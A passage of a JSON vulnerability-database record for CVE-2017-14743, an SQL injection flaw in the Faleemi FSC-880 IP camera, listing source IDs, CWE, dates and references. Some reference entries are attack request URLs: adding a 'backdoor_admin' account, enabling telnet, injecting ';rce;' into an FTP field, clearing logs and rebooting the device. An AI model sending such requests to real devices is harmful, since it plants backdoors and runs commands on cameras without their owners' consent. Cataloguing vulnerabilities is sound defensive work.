            "id": "CNNVD-201709-1229",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-31141",
            "trust": 0.6
          },
          {
            "db": "PACKETSTORM",
            "id": "144392",
            "trust": 0.2
          },
          {
            "db": "VULHUB",
            "id": "VHN-105496",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-31141"
          },
          {
            "db": "VULHUB",
            "id": "VHN-105496"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-008555"
          },
          {
            "db": "PACKETSTORM",
            "id": "144392"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201709-1229"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-14743"
          }
        ]
      },
      "id": "VAR-201709-0746",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-31141"
          },
          {
            "db": "VULHUB",
            "id": "VHN-105496"
          }
        ],
        "trust": 1.325
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-31141"
          }
        ]
      },
      "last_update_date": "2025-04-20T23:04:17.229000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.faleemi.com/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-008555"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-105496"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-008555"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-14743"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.6,
            "url": "https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce"
          },
          {
            "trust": 1.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14743"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14743"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/log.cgi?cmd=deloperlog"
          },
          {
            "trust": 0.1,
            "url": "https://www.faleemi.com/product/fsc880-1080p-wirelee-ip-camera/"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/wifi.cgi?cmd=getwifiattr"
          },
          {
            "trust": 0.1,
            "url": "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#passworddigest\"\u003euhzj"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/net.cgi?cmd=getupnpattr\u0026cmd=getupnpmap\u0026cmd=getupnptmstatus"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.8.102/hy-cgi/device.cgi?cmd=sysreboot"
          },
          {
            "trust": 0.1,
            "url": "http://www.w3.org/2001/xmlschema\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "https://www.nwsvr1.com,"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/device.cgi?cmd=getdeviceinfo"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/user.cgi?cmd=getuserattr"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/ftp.cgi?cmd=getftpattr"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=getddns"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=settelnetstatus\u0026enable=1"
          },
          {
            "trust": 0.1,
            "url": "http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/user.cgi?cmd=adduser\u0026at_username=backdoor_admin\u0026at_password=backdoor_password\u0026at_rolename=admin"
          },
          {
            "trust": 0.1,
            "url": "http://www.nwsvr1.com/api/userip.asp"
          },
          {
            "trust": 0.1,
            "url": "http://www.w3.org/2001/xmlschema-instance\""
          },
          {
            "trust": 0.1,
            "url": "https://www.onvif.org)."
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/smtp.cgi?cmd=getsmtpattr"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/net.cgi?cmd=setupnpattr\u0026upnp_enable=1"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/log.cgi?cmd=cleanlog"
          },
          {
            "trust": 0.1,
            "url": "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#base64binary\"\u003efd"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/ddns.cgi?cmd=get3thddnsattr"
          },
          {
            "trust": 0.1,
            "url": "https://iotsploit.co/"
          },
          {
            "trust": 0.1,
            "url": "http://www.w3.org/2003/05/soap-envelope\""
          },
          {
            "trust": 0.1,
            "url": "http://www.w3.org/2005/08/addressing\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.onvif.org/ver10/device/wsdl\"/\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd\"\u003e1970-01-01t00:03:58"
          },
          {
            "trust": 0.1,
            "url": "https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=gettelnetstatus"
          },
          {
            "trust": 0.1,
            "url": "http://ip/hy-cgi/ftp.cgi?cmd=setftpattr\u0026ft_server=;rce;\u0026ftp_port==25\u0026ft_username=\u0026ft_password=\u0026ft_dirname="
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/user.cgi?cmd=checkuserinfo"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-31141"
          },
          {
            "db": "VULHUB",
            "id": "VHN-105496"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-008555"
          },
          {
            "db": "PACKETSTORM",
            "id": "144392"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201709-1229"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-14743"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-31141"
          },
          {
            "db": "VULHUB",
            "id": "VHN-105496"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-008555"
          },
          {
            "db": "PACKETSTORM",
            "id": "144392"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201709-1229"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-14743"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-10-23T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-31141"
          },
          {
            "date": "2017-09-26T00:00:00",
            "db": "VULHUB",
            "id": "VHN-105496"
          },
          {
            "date": "2017-10-23T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-008555"
          },
          {
            "date": "2017-09-29T17:58:30",
            "db": "PACKETSTORM",
            "id": "144392"
          },
          {
            "date": "2017-09-30T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201709-1229"
          },
          {
            "date": "2017-09-26T06:29:00.187000",
            "db": "NVD",
            "id": "CVE-2017-14743"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-10-23T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-31141"
          },
          {
            "date": "2017-10-10T00:00:00",
            "db": "VULHUB",
            "id": "VHN-105496"
          },
          {
            "date": "2017-10-23T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-008555"
          },
          {
            "date": "2017-09-30T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201709-1229"
          },
          {
            "date": "2025-04-20T01:37:25.860000",
            "db": "NVD",
            "id": "CVE-2017-14743"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "144392"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201709-1229"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Faleemi FSC-880 SQL Injection Vulnerability",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-31141"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201709-1229"
          }
        ],
        "trust": 1.2
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201709-1229"
          }
        ],
        "trust": 0.6
      }
    }